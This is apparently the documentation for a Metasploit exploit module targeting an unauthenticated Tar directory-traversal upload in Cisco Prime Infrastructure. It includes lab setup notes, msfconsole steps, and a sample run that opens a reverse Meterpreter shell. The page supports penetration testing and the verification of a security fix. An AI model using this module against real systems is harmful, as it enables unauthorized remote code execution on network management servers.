## Description

This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability.

## Vulnerable Application

Cisco Prime Infrastructure releases prior to 3.4.1, 3.5, and 3.6, also EPN Manager releases prior to 3.0.1. The Metasploit module is specifically designed to target CPI 3.4.0.

## Notes on Setup

While developing the exploit, I happended to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first.

Special thanks to Steven Seeley (mr_me) for providing some of the most important setup notes himself.

**Hardware Requirements**

There are two machines you want to set up using the same ISO, the first is called the "primary" server, and the other is "secondary" (High Availability) server. They both require the same hardware:

* 4 CPU Cores.
* 12288 MB of RAM (12GB).
* 350GB of hard drive space, but you may still run out of it in days.
* Both VMs should be on the same network.

**SCP**

In case you want to transfer files, you will probably use scp. Before you do that, run the following script as admin on CPI. It will generate the credentials you need to scp files:

```
/opt/CSCOlumos/bin/getSCPcredentials.sh
```

By default, the CPI's SSH server's authentication method is password, you may end up running scp like this:

```
scp -r -o PreferredAuthentications=password admin@ip:/tmp/something.zip .
```

**Out of Space Issues**

Cisco Prime Infrastructure requires a lot of space on the primary server. If it ever reaches to a point where it shuts down unexpectedly, you may not be able to bring the NCS services back again (such as port 80, 443, or 8082). At least for me, I couldn't figure out. If that's the case, you may need to reinstall the VM.

**Unstable HA Connection**

Sometimes the primary and secondary may experience some difficulty staying connected. If this happens, try to do the following on both machines:

1. Run `ncs stop` to stop the services
2. Run `ncs cleanup`
3. Run `ncs start`, this may take 10 to 30 minutes to finish.
4. Finally, run `ncs status` to make sure they are talking.

If the secondary server isn't working with the primary, then the HealthMonitor service may not be in the exploitable condition.

## Verification Steps

1. Start msfconsole
2. Do `use exploit/linux/http/cpi_tararchive_upload`
3. Do `set payload` to select the preferred payload
4. `set rhosts [ip]`
5. `run`, this should give you a shell

## Scenarios

**Running the check**

```
msf5 exploit(linux/http/cpi_tararchive_upload) > check
[*] 192.168.0.23:8082 - The target service is running, but could not be validated.
```

**Exploiting the service**

```
msf5 exploit(linux/http/cpi_tararchive_upload) > run

[*] Started reverse TCP handler on 192.168.0.21:4444 
[*] Uploading tar file (3072 bytes)
[*] Executing JSP stager...
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 3 opened (192.168.0.21:4444 -> 192.168.0.23:57127) at 2019-06-07 02:50:13 -0500
[!] This exploit may require manual cleanup of '/tmp/UdqUlWsFjp.bin' on the target
[!] This exploit may require manual cleanup of 'apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp' on the target

meterpreter > 
[+] Deleted /tmp/UdqUlWsFjp.bin
[+] Deleted apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp
```
